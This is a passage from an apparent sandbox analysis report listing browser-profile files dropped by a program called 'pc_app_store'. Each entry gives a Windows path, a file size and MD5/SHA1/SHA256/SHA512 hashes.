00583a8f778f59684bb8164ba57a54b24eb08f8118bf107a12f2d1f407b3f7ae

SHA512
56cb5e7b6b8f35b6c9c58f94c07256e522d4ad43fb35d048342667a60fd9d6b859a679039d55b8a68d16b167e69f3beeb7c2412d898bd11a7b9de64a87981730

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe59f6d9.TMP

Filesize
48B

MD5
4c1d4c9f410e06a00eb6cefeaa71348a

SHA1
5a19f4850ac06e77f1e685df4e45bad31216afd4

SHA256
ae0ef42390e452e0bdcea9242830e4b50e79a1ced7e8ba293f352c48a9027b4a

SHA512
6fdd5ae5cb41cae1e096abbaa6dd1421f067171dc6fa3e23ba4eb3a48670e31800c9c6a2cbe8ebff58827336d24af44676087a34df8add9ad94d253f077d3014

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
1445a99a4cb36bc36893bb93eb4bdf25

SHA1
6ec9abcecb4b4401db48a81a9ee432dc84953979

SHA256
d5ace3cef4b972f76132ff6bde87c3832fabdbc1e82aa59a10e23c34c87f5f7a

SHA512
a1acd6952b100dee1d585c5ee85ffe081260a4a71261a5a00d9c31d8150f42a4d1548ed58b4c9536e7b574495cc5586c6a8479971ddce92c4bd1077dec85bfd9

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
fdc3829cd607ac5a1bd8685e6a868461

SHA1
71f862af5cdca826c925ea85fbc784a7b951244e

SHA256
9db90bb316dd3dc23b30f89cc3a5d6525e1fe98b051cc837c14daa20155ac87a

SHA512
4d28edb8076d830e3443e7c9292cd04492b7f742d18a655a47ba86d5f67ffea9873569798c1476bc51df784aee942ee0a444cfa7f5b3ad4fdffa8b12fbd54ada

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
3535f09e73ef9f33cabf2ea67eeff44a

SHA1
14374664f5e904daf20fc79e8de131514d398e51

SHA256
7fd534f2f2936bc80ec671cff041b1332f4924441a2230ecbcbd1ccc85cc1480

SHA512
a4a0d0e7a423d620915d3a0065b1a79e6e41cdeb4136f24ab2023e0a23550b14fb3fba3476af09305034e926f05b85ec955752eebff14a40a64a02ba67673b33

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Network\Network Persistent State~RFe5aa4cd.TMP

Filesize
59B

MD5
2800881c775077e1c4b6e06bf4676de4

SHA1
2873631068c8b3b9495638c865915be822442c8b

SHA256
226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

SHA512
e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Network\TransportSecurity

Filesize
682B

MD5
00501ec9a054d495be88cd59b9677a80

SHA1
026b623fa8adb490b86e2fb682131143192db87f

SHA256
2eb205bb650efd1fa0a7fc7f1910be701de8c97e41176dcfde4d6a8072c4ee51

SHA512
42d8a8ec922b167e5957122f1d05959a22c6290646c24a74c8e66cced9dae06b23995d6bc0164d89423d13f4842102a4fedebbe97076ae575f29f34988f7424e

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Network\TransportSecurity

Filesize
684B

MD5
7b1c58f39717fd38a417c7e7bb88ed85

SHA1
5173a5395c69ad37aa60d3ef5e118452bff13f6b

SHA256
3cca2e1a1548642130fd7d9c92fcf2a307ebcc94a392066c24b02f1abc8227bd

SHA512
912e4d76342eea8236adde5b458e4089b68cab889d56fbd919be7a0ed2175b0728bc2720500109edbf034ebfe51be71e8aa29f2a62895954e2d40ab34c909679

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Network\TransportSecurity

Filesize
684B

MD5
85adc2bec803f0cee0c71b950ae12b86

SHA1
1a23228bb1754e371ec018108a27ac295418c34c

SHA256
9340be438c92e42961d6289e2af34d5db3871ed378bc4ee99bc31854a682ee56

SHA512
35f7ea95fd4971d879d652962407f327d1d064db5f4a0ceaf8e6635533e88d5e363fa6943aaec77d085365b6aaeb4d455171c3ea5ac09adaa4b15ca92048c4a5

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Network\TransportSecurity

Filesize
684B

MD5
5a5a56179b7d71f35fb03175e319028a

SHA1
90185a739e95abaf4e23bfa712c326961c979c39

SHA256
30491be95fdc0ed8f8dd204decfe22a54c6c9ba01c95a4156ab65528f3545974

SHA512
c1dedd7fbf0ee5038e9dd6464b6913f7afb5a13c70e29ede131fb2a71762188b7fe050ace6051c9f87f2668e6023ffaf0f43bc10b792e4acbc3c4543981f35e6

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Network\TransportSecurity

Filesize
682B

MD5
f040f5c698dddcef41904b97c8f74753

SHA1
56c38840711c04cc1637aa99b6c1ca01cf2fb9df

SHA256
febe3d76ea164dff2005a15c8e260c0b78b43db7f5c5680d38630a2ef2111792

SHA512
6d97bd15cb680762bb44a4d8cf2e20dbe2e97abbaad4e14cb206fb5e2bde85c7521f8371e7a2453fcf641b4f417bb304020ee000c0f02117d103050596f4976d

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Network\TransportSecurity~RFe59ef86.TMP

Filesize
682B

MD5
3222bfc733c395a663965b0f883a9410

SHA1
229b7fc389f539035e2fae194cd14cc7034a5b0e

SHA256
9daa7cdee4ae4996036e1e6d3755206f00c7be907c901ba6cfcc743aa8cb5ac9

SHA512
408e63c12eee9794e3f34079828e38740b4ce817a98e388529a936013b46a537d305a8a1812cff334d8a29355e8e222a2fa3304e370a8c540bd77216f1697cd7

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
6683a6d9af30e8221c01c1a35d004427

SHA1
6da34dede8b1cad4e9846455375fe860dc49024c

SHA256
fc23d091d6c4cc9ef29bdcfe4713cb664a32bd41c9762063202cbd39e0353ada

SHA512
4d24bdc5a4851f5d0d608f9eaadcde7d6bd7e66c17bfdaf9015288088d9d20ec7071721260b7a5f67a9effb364e6fed685c354f3b0a2bcb083ef52ee9d547194

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
33e724c747b3807ae9dcd5e333b3f883

SHA1
c62cf437cae5c4e78a2c2825544a21381d05f8ba

SHA256
4e5cefbcb0edf3c0ce5f99e2621612467e06b1cd087eb37dcb2c1969e2d48f53

SHA512
0a675be079556b1a9d1ea5b151acd1889f33d72beb5ae7b287101c2573107c97825fa70b3b3b16ea6403fb486bbf49f8df8163b061345762c3a0722b7cc59296

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
4KB

MD5
abe431ab99535d769fb652e044f54441

SHA1
662fa93f25ce0946367bf650119a623a69c14574

SHA256
427e04c369cbf289e1f339b56f1be21cd4eccef055213b4997ce6f860714faf2

SHA512
7977f78c64b87f3bcc235ddf25692111e9cb19c02934ae151e50c7dfef645849f38feb72be75ae50037d9fa5b4efceb01c9641a77a05ad733f915ba7bb401803

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
82f2d76e28c722e263c5d83d32c29532

SHA1
865f2e1cf767a67ffcddfd01e25883bb8e9e0048

SHA256
d7d880bda2891113ee4a483f6272a42e93faaf9c1ed7f86e11cdb45d6109bfa7

SHA512
bc087b0e31367b6966907086a49536897c4ab96a9fbd2893957ef0123d5d4f92dc831e25ced81361d8bc21fce97acc870837964d8dd370eee2c687529fdc153d

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
4KB

MD5
597ceabb83808730bcffb53028770848

SHA1
9ee1c392c4cb787d34ae6dc44b554dfb0917dd3f

SHA256
0616c4ac1fda4fa1b9b65a01896a5c99785d76295b6ac5d5d2c698535f2d7b28

SHA512
51e5cf1cdccb11b9b8055130fe2473f2c99f9ef1bd23d1baea31726f16adeecbf3d35c414f2edfd2d5695bbf4f83db9925344222e8713daeabb8149d9fefbd62

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
448b0ebaba378934a985ac967eb47be2

SHA1
6432e7b08c90bb936d91eb59acfb6b3242765a15

SHA256
e6e37667420dcab55c4ec2f2c418151982c0e69fb8e4f835776cb926f7822359

SHA512
f33f5c3182b92eee3e93b2c406447c3744b0621bcd7856f936d96cdb9f9346239f31a1c754e34bbd762827210934f3c974d370c788eb6e236ea291af9f59a140

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
b9fef70fcf53d6d0af0c544d247dcee1

SHA1
98e12b2262d879deefdae42df99ad7ed4f3d85c7

SHA256
09194a2eb340739806c16a3729392d77d60941f647ade64a6e6e95b7d830f148

SHA512
7df4d0a8aaaaf5dcaf4bca5dddc99546ee1bf1d6f76cf0c352267dd901e256ed931be783e70498767d33c4ed73f2be1a66b95d0623cd61b9e6464b28dd6008c2

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
6e1289d50ee1429650d96d6ab07a15b7

SHA1
02d4ff8b09149d67b768cea8e14401acc2ae5315

SHA256
a47d17e68ec4012c772e7e3674b51345e89b58f4e9c8ed5569387263aa837722

SHA512
6f92feaef4b8d17036ffcc5eaf2297878af7e86d44f3a0c7d5c6cb60ef8cf192c7bffa299fffb62637ae7b98b9557fe8e514fafd0a5b9e7ee13f0049947894ac

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
5189c2da5b32e2d25f53a6eba87f08d2

SHA1
eb580cc2ae405fad7e0fe37003b48802411fe97b

SHA256
a850cd189391cbaa54786c0f2d66fdd63e14ad8031e437e92fdfc5bbf3a68c45

SHA512
476b0ba61955a0b0bd793fbb3004d5e780f471bbdf3b5764ae87384f8ec8bb47c9aa3aee6b5d675db23984d70688370d0b01cde3befedac81062374954a1311e

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
ed400916dde4d7afe98f382cefbb6d5b

SHA1
768efe8587674413e162c6e47495ad34831ee273

SHA256
129c7386841828a4d72d13e86774fcce4e1d0dfc22b5646458ce6d9d750a50f8

SHA512
7017290ba2131c4ccc722d632a1f76b5c3db835d93ea20bcf9d56419bb49d87d9ae7030802be341d1a416fec218dd8e9fd55dbb99e9eff56e1f7ee9e859cdf61

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
c9a4d71525825359e6ead6a56cec6a91

SHA1
d8a36b4890678f9ce53a35554e183690c9ca8dad

SHA256
4d53a36f741ac15fd05282d0d38a4d084d51d8c05798994c1316b41a1b4f49ad

SHA512
ef6ef9a335cc31c412f02a64fd14415cdf3abd384596a000e2472dcdb661a3cccb88a3626bb37f3ee2f52c0a90411ee48f958dd553b22fa44f342550a17657bf

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
ec66799e04eb61bd5796acfe6caf5baa

SHA1
6082d9177ab9f9cd628786e599e4a35cb117f89b

SHA256
5da49b5104ad81bc2cb4bcd694574be952276b28c318ff8842b65ddbb6a28320

SHA512
74192918ae6b0fe203d3eaa5cb1c54733535161227e5fa0cb8950d07c003afbd98a989c0866344f7d3e9b88f8ca9aa359ce2e556a9684e501434253cdee29c27

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
87dd6cac40dabcd0fe427f56923f7f5a

SHA1
a3db20dc823ec861683ceb79a08e3f4fba5f96fa

SHA256
3c3c783d57c5f83256396d2664e31a85bf957d9d9d7e2b052b32992c1f329f11

SHA512
e8b97bd41b0f820af5b4753febfc72b5cba7ffbeabff88de52dfbbd1662e2ecc1054e610cbc1d705b04612cfa68357ac41571b1f4e5124ffa123ea43a841bdcb

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
1ccbadecae8f6d05bf207d0ec2d10daa

SHA1
b8144867cc31e58b0c14c19d28bf0d8cd3947151

SHA256
b835e91260b3e6c1f87201ddf132045c1fbeeb8862c18fa742edb891fab5c827

SHA512
3e3dee32a69b583a80e6a15d30ad245a3921254fe737c651130ef3119f578bbef3ee8c4913a6b3abc02904d3085e4226273d99b573099d35776d11b5baa755aa

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
4a6894e1ca0d90976662038e7c04d2ff

SHA1
529752d32a748e1c7476030d77b0b57d6009f612

SHA256
252e171c036290885e69f2bde115c1642265156f8634da8a96f5476696478de9

SHA512
83c395056aa54b9eafc3f90775cb930688295c43b9135b783f8f83696433dc14283feed23d7daa1d3796477d02d856aa17b3917c22f14b15f35efe6431953d52

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
68e7d770c5a1405cc6fc74f81a847cee

SHA1
b5c1b1d2eb0b5ce47ce3292c35540d415131b418

SHA256
679923dcccc1c4c4cb91acbcb816b850030d83f062150a6388d94964b1ae4b87

SHA512
83a41a4f182295e51db50be8a857149f908adbe4aa36d9b6241234f38c65090b4358643065046a1dc6b26f37423fe15a3918af5a6dffc831ff4405e8597e414b

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
54ab93a986e325e250d0be7f710135a1

SHA1
ed6025e78d6ae76a21c08f9e10ef15e15359dfda

SHA256
c82886b460a7a7455eb7f413aeed29b0c0db39e3b5075c58ad9306986e04542e

SHA512
842d3d5de2e174df0c520f8492cef09d36e80f7937be11ca847776325834bf6336b4c76d2b92d509931114d86f1714a1930c3871ac47f752ece738013869c94f

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
18b0676ab014a1f7951387dfecd9e3bb

SHA1
37658d5640de547da503b1b94f5e211e7be34533

SHA256
72811103a6553575f6a82c1943607d62967d882e3ccc2526585bbc777da0e269

SHA512
9984e1037c1b5e983d16d1071b4b5ad07600d63baa87856600abd73b357953829226720c29b72ff67cf0facc5b789674896934d34d3b6c4ffc24de19365b9a46

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
cf4c3776647d199382fa3282ffb855be

SHA1
e1ae78a8d1a6d2c7db88cac7a7b0e70d5e71bf20

SHA256
2ee0a9933d423aec667d8853185a198a0f2c6359c0f06b26792e99454fa3a77f

SHA512
1e3e980b00d026fdd682ce41bcaa96271289e22db6fa5435f6a06f89e668499ae955ab70667bf82acc63c98a8899655e6ef617d81038c139e191f3e8cf41a8d3

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
d53bcd6baae4da0f3c5d66c3f831c1c0

SHA1
d11c69e27f6e868df7940b9d291ec3edf0c7136a

SHA256
0289331dec05ff3012f064389a8e746b4c9a246e9477f020724b44ad7d3391cd

SHA512
7c82a97ac6bc5ff7891b4c961acf215925c3734c418f6c0e3ae1e1fa038bb5a3833085c6555e98b3549c43cdb4f6e9421a1f3dd1731bccbb00a2ffd042bad3a1

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
a6a866b7b3e556bfc5d0ca25c87574a4

SHA1
f997273050a1e3ca4400515d2f1f29de34fcf741

SHA256
064ef090d382d284e02cc643bd47c1c25db52853d0ab9173829c34bd6f904404

SHA512
51b14d1bd14b836cf151f49a785a53fd1a397c7f527d1b077dfefbceb8ebbd73a21e81e8d0bcc05640e8257d183bde1bd9e8973e5ddc5dd2d7aadec974533d5b

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
c3a13dc77d537648e7ad7e744d808e85

SHA1
33a776daee9cd1fc996e558dbb9cec6395d8c2e1

SHA256
b935d818a5d5193835ac0cf840f8d139f0f2f138ee60d847391526b3c460ba58

SHA512
49d611e77f11c83811b7173c43b5758f67bf97a84fd466ade4c2426884d1be5f84dbabc37a0a8490dacdba1680b5bea4456e2398550c291aeb0dda47c4d5ff06

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
7a6987cb3f4d9f0cdaff365a96f1fcf8

SHA1
5100a8a1ec01c6ac0283d01e053b97ba1b13a2bf

SHA256
6ec4030c193686b1650fe65129d6b862b26cfa36e340b39b59d72ba051de7cd1

SHA512
6c059fda97e981e0b1fbea2911e7b3e28f38583a83b7059c3d9c294ec51627ff062a67310f3ec9182649f6ca1c28d896d47d45b6a619c4657113b36a3aaee35a

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
03bb49e0a7a30dec28d8dd16048874b0

SHA1
81c774dcdafd07f06bcb3aff3519750a4b6aaff7

SHA256
06c463e8e57fa2eb99665dc4d15f8ef9bd104b36cdb955cece44852f59cc778f

SHA512
0302337b88483905f8ace05e4b5208a84366af316b6788d4689b959d8df8f5fa13757185169ea64063303a3da6d28103a7bdb77d35e3e53fbb56b8d588d2f83c

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
005f2b27c8756f79060940cbf18debda

SHA1
70eefcb89fcf9426c29144d100d687410be8f392

SHA256
cc704628364e9492ec094a4fb8d69e564f1d38a7cc487033d20df4a550b86225

SHA512
8a81256c2699e120f53ecbc6b6dc54a66714398c61b8230b93543ae923e7aff510b2115d4773033be2506d42fe0ae2aeb0af0e85aa04d4a0a3c4f59e9ec051a1

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
936f819525904f6ff835fbeb6622519b

SHA1
39dbdc15e3785599af95b55c2f7b62ac36dc6116

SHA256
29474e0b3ae48d70293e5f3cf945bbc53f0ed11597ec4125e85b344080b60b95

SHA512
60c2381110af99b281126b3477531341b7d450ab75b069966e9cbcdbfa06fe95de04aa6f001501c62b8ef8db841f321d9578cb0ebcbee60325a4b6e8b19ba81e

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
cbf9bcb79fd329d5de1174835b471eff

SHA1
eb56805a7730a6177bad44866d76888203bdd98a

SHA256
ea2ee062a23ffc6ad7b934bcddbd144179c1c2e350ea8842afd035df16bc6f47

SHA512
a32902ac22aa961cbc6e64425656f8b660469d7930c10c0a4185933b16588b7570360d42342eb451291061eedb11ec04b9e26beb024703b63d5ab5b3048282b5

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
a383518f9916ae37fe7403adc63ade67

SHA1
d93065f89a59eb4f6c95aa8db9e20277a7f5ec20

SHA256
ca2269e2b8586cd7699a7a439e9cecf6a1ae2d38d4de344a21f62c4245cc76ef

SHA512
5d0d9b5afb25887d0fcd145bded87745f647bdf6a3c01e3c2321495bdcc90699904d45502d3365935a49ec9e29fd9ea94ac4e7fd6c1c184759bcd92b6bc65da8

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
5f6f95ea71556ab2197008700da1723c

SHA1
df6d5187d2dc7e007269a11a68bda4a911b2753d

SHA256
d68e5cd21d2639f2099980230ed926b95b4f29cb4754b7579b1cb1481e5dab56

SHA512
25e9b0b4f220a277846079c749b5f2cb20d1f7d2a0e0a0d84c9979bb8d6bf3061ffe4efec30b5562918d08e458ad3b17b189609276e394858c4ca9314dec686a

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
ba278c9ee5165b2d687089f1b6fb827d

SHA1
b5ca18ec53eaf8b427965baeac79c8cf0d54dec3

SHA256
63770cb5a3ff07cfbb03033df25a2ac18cad81e57d09170b3df06c36084b1b90

SHA512
9fb50e3b38fe9e4c9cbf764a27e4984895870cfb4d84b156154fa8fb779e71c48f7e072ea62c31bacd4b286d2ad06ed8bb37a3c4243fd09cccb40560ba21f825

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
6e650d22b746fcd4d7f8435c3604256c

SHA1
da86cc99838f2b468e51bd11765ece8070488e17

SHA256
2dfcaae7c002a2191b283b3cfc17124c38dd891ae6ed664e7984bb858127e8e5

SHA512
dab0cbcf31cefa2b4d65db349d84ac7ec9fff6b235411f0c978cec996be33ff8404a5f7b2208b8370309ebcc1cd696ae7698bdadd7f4be9597db22ab84b2c5ec

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
8a660f59d693ace4d960d061efe91d40

SHA1
d38aae858841ab97e5a019e90566e36a0517b926

SHA256
4c340836182f5ae70c5d6197cee256d4f9eba072794b3cb5f82d0171694548c4

SHA512
d996604c0579fbd84515d4ff290d10dfd67c9863d0311929a4562dbc2ae4174725fac0e43b5748b5b8170e666e9cefe96e829026ae451b009a2019ae3785b5f8

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
7bf10012acd79c0d300d64ef922f0cca

SHA1
084150b71a3334651686d63c8b79ca276c141ead

SHA256
a32640bc8b5daae4454c54da307aae71517d3e0f62bfdab75cbc6bc1b24d6ce8

SHA512
0382c7805dbad49dbf235e4ed7fae37fda98975becbfe29321db76349ec802c3eec4b9edbc3081ce20046898c8b410eae896c787b0a6fe3633c4ad0bcc80cb5f

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
e84df087a5639ecfb6570ade09471110

SHA1
6fb85c4bee48f21f5623b0d1e01fd6cc866ea9fb

SHA256
03f1a516ce21afa63729ec2789293487104b1bb4cf92e5b58fd91a0b04f08cc1

SHA512
12151f47e3fdb05bd898d928e88f7617d93ddab8ae17f5c97591f9f7da98dfa197bfbda8a48bf8bbf25d0100a2c656c6ae1f73992af654cd9a2c0f6400f3969e

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
d6f11d7b3890d50e94d12b1ab3ff7c02

SHA1
f0d4f1bcda75323e7c112f12174e068c7fa2bd95

SHA256
71eebfa4023dc71f48826bd9de8e5177deba2ca571072cb2d41854e3d24072a1

SHA512
1ef8650b86ce94aec53c31e4675481d59ce89d9a92fe0c55e79fea2e3d1218dc85a6857ce1350171ca2ff6a9d8ef1c31537e5bf077c1ed452e4d8b7c3fb0b83b

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
c5d2edad9b5a2b8a7029c646dafa6066

SHA1
95f3ac5acc69e32278721c2459f2ecc5a6ecd46b

SHA256
3ea64c640cc86248fff78edc9e8be6e48d5d05fe41b6d4d500eaacf19dbeae39

SHA512
fbce33eaa63de51b3bb045a599bc3c18b543e69c532023e3a79a07730e610534d311df2cc08a8fd0199f4e50447d3353adf90b002aeabbecd2e5bf57650ae77b

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences

Filesize
5KB

MD5
e70df1985908e7b384e6f0d71c382068

SHA1
29a75f962d8885d3580b20e1613a5da240ec8ea3

SHA256
9ef7e72ea35b4c8b38f65d518f411a48fabbb0d8c403410d0453f0ffe937c7f5

SHA512
4f12605d13d8768a7ca93e16c9cc9b64e7d717ddeca960e737aa6bdfb7c092cd79547e2f20d2e70a999315db2350d37912fc13d53d15760301923ceb3d0e9d7a

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Preferences~RFe59e054.TMP

Filesize
4KB

MD5
268253496d9949c226c1234caf15539a

SHA1
df88930b946bf5b6c71e5b7ea21903691d57500d

SHA256
d27be62dd06484bcf8781171fe8aa4855718e70c98ea6b3adbae44c8c496d164

SHA512
c5d07cf7d15ae83865245bc4c61ca525caf0a0984ee9ddc65c72987f145ce2bcc4ca5fc720d1642b985449002a35e4ddc274657b1dd6098f5a0a8259996e88f5

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Sync Data\LevelDB\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Sync Data\LevelDB\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Default\Web Applications\_nwjs_pcapp.store\pc_app_store.ico.md5

Filesize
16B

MD5
03e9f614a008075733c76883156b568b

SHA1
5f9cb1b06928487c4b836e9dedc688e8a9650b0b

SHA256
b1a6a6fb45ad1e13054c40dc7c09e3098ee830bcf1ebaec27f640ae4c64b8416

SHA512
7e6969c8908a6bf57bd2cb4457a7c78360468383acee589278e49829617e2f3b872dd8213e57a2ed8f512d444c67a2e619deabdc1394d1c39c7759ed3c744f94

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\GraphiteDawnCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\GraphiteDawnCache\data_1

Filesize
264KB

MD5
d0d388f3865d0523e451d6ba0be34cc4

SHA1
8571c6a52aacc2747c048e3419e5657b74612995

SHA256
902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

SHA512
376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\GraphiteDawnCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\GraphiteDawnCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Local State

Filesize
2KB

MD5
288a1be2763e5207cd24cae260100b5c

SHA1
ba87d9a32493e90d48e8fad5aac38d988ace14e4

SHA256
98979f6e4ab09e15b16c7cb9415a3d53a0e8e3e9e51fbdff5d93072cb7c9778e

SHA512
67bd8c73129bb6196286d488886d43fbb8afef6af6326293d5ffa8bb87ba8ffad9c64db18956dc9bc5a4f2c4742dfafb5bc062e4afb67af22ddc03533e40c138

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Local State

Filesize
2KB

MD5
c234998ac8b88b4103327d894fe3d2cd

SHA1
c15a628b32f9a38cfee0d6565d676a2a6335cff3

SHA256
1f4fc912ebfbe9aee072c92531b845559681628e838c51562fd12d9dd4effc1f

SHA512
ff17ec59732825f933f890b878159a09f4216a839b548471016b9ac63b57e07e2f8661ecae61728f7031a565640c5d2437b2cecdc9f1dfe4d90f91d3cc1f165c

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\Local State~RFe59b6e2.TMP

Filesize
922B

MD5
281fa244b3e237e7e54872915df011eb

SHA1
6b3c9aa9bc46d8495e860e4b9aa73c077157a343

SHA256
b51010fa9faff99b47ce4910917cf1910e7bc06ec61eb6f60a899ccca36e31ac

SHA512
20128e13f829005c289a0ab4b4fd24d941d9f50a46f021f707bae92518439081f8c729232b6fa588b6408aabac61d3d97af19fbe0d88ff3bc150cdb8d74c176b

Download Submit
C:\Users\Admin\AppData\Local\pc_app_store\User Data\ShaderCache\index

Filesize
256KB

MD5
2be7d803cce942fcd492287f485fdbb1

SHA1
614f4dff151bcf8b544f897c3b526925471246a0

SHA256
